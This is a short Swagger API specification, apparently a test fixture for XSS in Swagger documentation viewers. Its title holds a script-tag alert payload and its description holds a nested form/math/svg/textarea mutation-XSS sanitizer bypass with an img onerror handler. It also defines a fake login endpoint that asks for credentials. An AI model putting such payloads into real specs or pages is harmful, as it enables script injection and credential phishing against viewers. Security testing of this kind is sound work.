swagger: '2.0'
info:
  version: 1.0.0
  title: <script>alert(1)</script>
  description: >
    Demo description. The following line includes a safe PoC payload:
        <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
    (This is for testing only.)

paths:
  /Login_Page:
    post:
      summary: Login here to continue
      description: Please provide your credentials to log in.
      parameters:
        - name: username
          in: formData
          description: 'The username for login (test)'
          required: true
          type: string
        - name: password
          in: formData
          description: 'The password for login (test)'
          required: true
          type: string
      responses:
        '200':
          description: Successfully logged in and authenticated.
